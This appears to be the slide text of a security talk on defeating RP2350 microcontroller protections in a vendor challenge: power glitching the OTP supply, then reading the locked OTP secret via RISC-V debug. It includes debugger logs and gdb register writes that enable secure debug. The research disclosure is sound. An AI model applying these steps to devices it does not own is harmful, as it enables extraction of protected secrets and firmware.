



HACKING THE  
**RP2040**



Aedan Cullen

## A secure microcontroller **with** a supportive vendor?

- Raspberry Pi seems to be targeting commercial/industrial MCU customers
- Evolution of RP2040 ideas, more SRAM, etc.
- What is this weird core-swapping thing?!



- Audited (to some extent?) by Hextree and NewAE
- Challenge started at DEF CON, then extended



*"Double your embedded CPU architectures, double your fun!"*

- Raspberry Pi

## Challenge goal: Read out a protected OTP secret

```
picotool otp set -e 0xc08 0xc0ff
picotool otp set -e 0xc09 0xffee
picotool otp set -e 0xc0a 0xc0ff
picotool otp set -e 0xc0b 0xffee
picotool otp set -e 0xc0c 0xc0ff
picotool otp set -e 0xc0d 0xffee
picotool otp set -e 0xc0e 0xc0ff
picotool otp set -e 0xc0f 0xffee
```

Then, lock down chip, enabling:

- OTP PAGE48 lock
- Secure boot
- Glitch detectors
- Debug-disable option

# 1. Critical thinking

An overview of the RP2350's security



RP2350 A microcontroller by Raspberry Pi

## RP2350 Datasheet

A microcontroller  
by Raspberry Pi

OTP/peripheral access permissions

TrustZone secure/non-secure worlds

ROM secure-boot path

Redundancy  
Coprocessor

Glitch  
detectors

Debug  
disable

RISC-V  
disable

OTP critical-bit readout

# 1. Critical thinking

An overview of the RP2350's security

OTP\_DATA: CRIT1 (row 0x040; eight copies)

|      |                                                                                                                                             |
|------|---------------------------------------------------------------------------------------------------------------------------------------------|
| 23:7 | Reserved                                                                                                                                    |
| 6:5  | <b>GLITCH_DETECTOR_SENS:</b> Increase the sensitivity of the glitch detectors from their default.                                           |
| 4    | <b>GLITCH_DETECTOR_ENABLE:</b> Arm the glitch detectors to reset the system if an abnormal clock/power event is observed.                   |
| 3    | <b>BOOT_ARCH:</b> Set the default boot architecture, 0=ARM 1=RISC-V.<br>Ignored if ARM_DISABLE, RISCV_DISABLE or SECURE_BOOT_ENABLE is set. |
| 2    | <b>DEBUG_DISABLE:</b> Disable all debug access                                                                                              |
| 1    | <b>SECURE_DEBUG_DISABLE:</b> Disable Secure debug access                                                                                    |
| 0    | <b>SECURE_BOOT_ENABLE:</b> Enable boot signature enforcement, and permanently disable the RISC-V cores                                      |

# 1. Critical thinking

An overview of the RP2350's security

OTP\_DATA: **CRITO** (row 0x038; eight copies)

|      |                                                                       |
|------|-----------------------------------------------------------------------|
| 23:2 | Reserved                                                              |
| 1    | <b>RISCV_DISABLE:</b> Permanently disable RISC-V processors (Hazard3) |
| 0    | <b>ARM_DISABLE:</b> Permanently disable ARM processors (Cortex-M33)   |

# 1. Critical thinking

An overview of the RP2350's security



# 1. Critical thinking

An overview of the RP2350's security



*“Guarded reads perform an additional hardware consistency check to detect power transients. If this check fails, the read returns a bus fault. “*

# 1. Critical thinking

An overview of the RP2350's security

OTP\_DATA: CRIT0 (three-of-eight)

OTP\_DATA: CRIT1 (three-of-eight)

OTP: CRITICAL (0x40120148)

|       |                        |
|-------|------------------------|
| 31:18 | Reserved               |
| 17    | RISCV_DISABLE          |
| 16    | ARM_DISABLE            |
| 15:7  | Reserved               |
| 6:5   | GLITCH_DETECTOR_SENS   |
| 4     | GLITCH_DETECTOR_ENABLE |
| 3     | DEFAULT_ARCHSEL        |
| 2     | DEBUG_DISABLE          |
| 1     | SECURE_DEBUG_DISABLE   |
| 0     | SECURE_BOOT_ENABLE     |

## 2. Anti-fuse fuse club

Details of the chip's OTP design



## 2. Anti-fuse fuse club

Details of the chip's OTP design



### Synopsys Expands DesignWare IP Portfolio with Acquisition of Sidense Corporation

Acquisition Adds One-Time Programmable Non-Volatile Memory IP to DesignWare NVM IP Offering

Share:

MOUNTAIN VIEW, Calif., Oct. 17, 2017 /PR



An SHF module consists of an OTP core (the bitcell array), charge pump hard macro for in-field programming (generates the non-standard voltages required), device access port (DAP) providing access through 16/32 bit parallel bus and SBPI, which provides serial and byte-wide interfaces with SPI-compatible protocols. Read speeds are as low as 20ns depending on configuration and process and (at 28/20nm) a 1us/bit write speed.

### Sidense 1T-OTP Memory Macros Meet JEDEC Accelerated Testing Qualifications

At two TSMC 28nm process nodes

This is a Press Release edited by StorageNewsletter.com on December 31, 2013 at 2:51 pm

**Sidense Corp.**, developer of non-volatile memory OTP IP cores, announced that its [SHF Non-Volatile Memory](#) (NVM) macros have met JEDEC accelerated testing requirements for TSMC's 28HPM and 28HPL process nodes.



### Patented 1T-Fuse™ Split Channel Bit Cell





RP2350ADA2 19  
P6BB26.00 24



Camera + X-ray composite



Camera + X-ray + microscope composite



Optical microscope image



Optical microscope image



Optical microscope image



Optical microscope image





Optical microscope image





Optical microscope image

SRAMO-7

SRAMO-7



X-ray + optical microscope composite







VVA41HE  
JQ41DU









lock\_chip.sh











### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM

microamps (USB\_OTP\_VDD)



### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM

microamps (USB\_OTP\_VDD)



### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM

microamps (USB\_OTP\_VDD)



### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM

microamps (USB\_OTP\_VDD)



### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM

microamps (USB\_OTP\_VDD)



### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM

microamps (USB\_OTP\_VDD)



### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM



### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM



### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM

microamps (USB\_OTP\_VDD)



### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM



### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM

microamps (USB\_OTP\_VDD)



### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM

microamps (USB\_OTP\_VDD)



### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM

microamps (USB\_OTP\_VDD)



### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM

microamps (USB\_OTP\_VDD)



### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM

microamps (USB\_OTP\_VDD)



### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM

microamps (USB\_OTP\_VDD)



### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM

microamps (USB\_OTP\_VDD)



### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM

10  $\mu$ s pulse after 125  $\mu$ s

OTP controller boot restarts immediately



### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM

10  $\mu$ s pulse after 350  $\mu$ s

OTP PSM finishes, then restarts itself from beginning



### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM

10  $\mu$ s pulse after 350  $\mu$ s

Sometimes, OTP PSM finishes and is happy (?)



### 3. Interruptible power supply

Experimenting with the IPS and OTP PSM



Debug is still locked down :(

```
$ JLinkExe -device CORTEX-M33 -if SWD -speed 4000
...
...
Connecting to target via SWD
Found SW-DP with ID 0x4C013477
DPIDR: 0x4C013477
CoreSight SoC-600 or later (DPv3 detected)
Detecting available APs
APSpace base (BASEPTR0): 0x00000000
APSpace size (DPIDR1.ASIZE): 20-bit (1024 KB)
Top-level ROM table, that describes AP map, found
Scanning top-level ROM table and nested ones to find APs
AP[0] (APAddr 0x00002000): AHB-AP (IDR: 0x34770008)
AP[1] (APAddr 0x00004000): AHB-AP (IDR: 0x34770008)
Iterating through AP map to find AHB-AP to use
AP[0]: Skipped. Could not read CPUID register
AP[1]: Skipped. Could not read CPUID register
Attach to CPU failed. Executing connect under reset.
```



## 4. Siri, set a timer for 5 µs

Visualizing 60,000 IPS power faults

No obvious progress on debug-disabled M33

5 µs pulse, 10 tries every 100ns offset

■ No M33 debug



## 4. Siri, set a timer for 5 µs

Visualizing 60,000 IPS power faults



Learning more on a debuggable chip

5 µs pulse, 10 tries every 100ns offset



## 4. Siri, set a timer for 5 µs

Visualizing 60,000 IPS power faults



Learning more on a debuggable chip

5 µs pulse, 10 tries every 100ns offset





## Why is it failing there?

50 µs pulse at ~250 µs

```
$ JLinkExe -device CORTEX-M33 -if SWD -speed 4000
...
...
Connecting to target via SWD
Found SW-DP with ID 0x4C013477
DPIDR: 0x4C013477
CoreSight SoC-600 or later (DPv3 detected)
Detecting available APs
APSpace base (BASEPTR0): 0x00000000
APSpace size (DPIDR1.ASIZE): 20-bit (1024 KB)
Top-level ROM table, that describes AP map, found
Scanning top-level ROM table and nested ones to find APs
AP[0] (APAddr 0x0000A000): APB-AP (IDR: 0x24770006)
Iterating through AP map to find AHB-AP to use
AP[0]: Skipped. Not an AHB-AP
Attach to CPU failed. Executing connect under reset.
```



AP[0] (APAddr 0x0000A000): APB-AP (IDR: 0x24770006)



That's the RISC-V debug access port...



The RISC-V APB-AP also appears when secured!

5 µs pulse, 10 tries every 100ns offset

AP[0] (APAddr 0x00002000): AHB-AP (IDR: 0x34770008)

AP[1] (APAddr 0x00004000): AHB-AP (IDR: 0x34770008)

AP[0] (APAddr 0x0000A000): APB-AP (IDR: 0x24770006)



microseconds

## 5. I don't drink coffee

Reading secrets and more with the RISC-V cores

```
$ openocd -f jlink.cfg -c "adapter speed 5000" -c "set USE_CORE 0" -f rp2350-riscv.cfg
Open On-Chip Debugger 0.12.0+dev-gebec9504d (2024-09-14-03:22)
Licensed under GNU GPL v2
For bug reports, read
          http://openocd.org/doc/doxygen/bugs.html
adapter speed: 5000 kHz
0
Info : Listening on port 6666 for tcl connections
Info : Listening on port 4444 for telnet connections
Info : J-Link V11 compiled Dec  4 2024 17:53:35
Info : Hardware version: 11.00
Info : VTarget = 3.315 V
Info : clock speed 5000 kHz
Info : SWD DPIDR 0x4c013477
Info : [rp2350.dap.core0] datacount=1 progbufsize=2
Info : [rp2350.dap.core0] Disabling abstract command reads from CSRs.
Info : [rp2350.dap.core0] Disabling abstract command writes to CSRs.
Info : [rp2350.dap.core0] Examined RISC-V core
Info : [rp2350.dap.core0] XLEN=32, misa=0x40901105
Info : [rp2350.dap.core0] Examination succeed
Info : starting gdb server for rp2350.dap.core0 on 3333
Info : Listening on port 3333 for gdb connections
```



## 5. I don't drink coffee

Reading secrets and more with the RISC-V cores



```
(gdb) target remote :3333
Remote debugging using :3333
warning: No executable has been specified and target does not support
determining executable automatically. Try using the "file" command.
0x00007640 in ?? ()
(gdb) x/32wx 0x40137020
0x40137020: 0x0022c0ff 0x0014ffee 0x0022c0ff 0x0014ffee
0x40137030: 0x0022c0ff 0x0014ffee 0x0022c0ff 0x0014ffee
0x40137040: 0x00000000 0x00000000 0x00000000 0x00000000
0x40137050: 0x00000000 0x00000000 0x00000000 0x00000000
0x40137060: 0x00000000 0x00000000 0x00000000 0x00000000
0x40137070: 0x00000000 0x00000000 0x00000000 0x00000000
0x40137080: 0x00000000 0x00000000 0x00000000 0x00000000
0x40137090: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) x/1wx 0x40120148
0x40120148: 0x00030033
(gdb)
```

# 5. I don't drink coffee

Reading secrets and more with the RISC-V cores

0x00030033

OTP: CRITICAL (0x40120148)

|       |                        |
|-------|------------------------|
| 31:18 | Reserved               |
| 17    | RISCV_DISABLE          |
| 16    | ARM_DISABLE            |
| 15:7  | Reserved               |
| 6:5   | GLITCH_DETECTOR_SENS   |
| 4     | GLITCH_DETECTOR_ENABLE |
| 3     | DEFAULT_ARCHSEL        |
| 2     | DEBUG_DISABLE          |
| 1     | SECURE_DEBUG_DISABLE   |
| 0     | SECURE_BOOT_ENABLE     |

Selects RISC-V

Allows RISC-V full-privilege debug

Don't care

Don't care





The guard word is **0x333333**,  
and RPi is unaware the SHF has persistence

```
+0x000 SW_LOCK0
+0x004 SW_LOCK1
+0x008 SW_LOCK2
+0x00C SW_LOCK3
+0x010 SW_LOCK4
+0x014 SW_LOCK5
+0x018 SW_LOCK6
+0x01C SW_LOCK7
+0x020 SW_LOCK8
+0x024 SW_LOCK9
+0x028 SW_LOCK10
+0x02C SW_LOCK11
+0x030 SW_LOCK12
+0x034 SW_LOCK13
+0x038 SW_LOCK14
+0x03C SW_LOCK15
+0x040 SW_LOCK16
+0x044 SW_LOCK17
+0x048 SW_LOCK18
+0x04C SW_LOCK19
+0x050 SW_LOCK20
+0x054 SW_LOCK21
+0x058 SW_LOCK22
+0x05C SW_LOCK23
+0x060 SW_LOCK24
+0x064 SW_LOCK25
+0x068 SW_LOCK26
+0x06C SW_LOCK27
+0x070 SW_LOCK28
+0x074 SW_LOCK29
+0x078 SW_LOCK30
+0x07C SW_LOCK31
+0x080 SW_LOCK32
```



microseconds



Can we escalate from RISC-V  
to M33 secure-mode debug?

Easy!

```
(gdb) set *0x40120150 = 0x00000010f  
(gdb) set *0x40018008 = 0x00000002  
(gdb) set *0x400d8000 = 0x80000000
```

(Set all DEBUGEN bits)  
(Set system PSM WDSEL to 0TP)  
(Trigger watchdog reset)

```
$ JLinkExe -device CORTEX-M33 -if SWD -speed 4000
...
...
Connecting to target via SWD
Found SW-DP with ID 0x4C013477
DPIDR: 0x4C013477
CoreSight SoC-600 or later (DPv3 detected)
Detecting available APs
APSpace base (BASEPTR0): 0x00000000
APSpace size (DPIDR1.ASIZE): 20-bit (1024 KB)
Top-level ROM table, that describes AP map, found
Scanning top-level ROM table and nested ones to find APs
AP[0] (APAddr 0x00002000): AHB-AP (IDR: 0x34770008)
AP[1] (APAddr 0x00004000): AHB-AP (IDR: 0x34770008)
Iterating through AP map to find AHB-AP to use
AP[0]: Core found
AP[0]: AHB-AP ROM base: 0xE00FF000
CPUID register: 0x411FD210. Implementer code: 0x41 (ARM)
Feature set: Mainline
Cache: No cache
Found Cortex-M33 r1p0, Little endian.
FPUnit: 8 code (BP) slots and 0 literal slots
Security extension: implemented
Secure debug: enabled
```



## 6. Summary

### Attempted mitigations:

Guard reads: **Fundamental HW misunderstanding**

OTP PSM ring osc. randomization: **Nonexistent? Insignificant?**

### Irrelevant security features:

Glitch detectors: **Not on USB OTP\_VDD!**

RPC: **Game over *before* ROM code!**

## 6. Summary

### Lessons:

Human communication factors are huge  
Sidense knew how to do guards properly, and RPi missed out

“Permanent” is not a thing unless it involves chip destruction  
There is some copper somewhere with each signal...

Remember to glitch in the places they *don't* tell you to

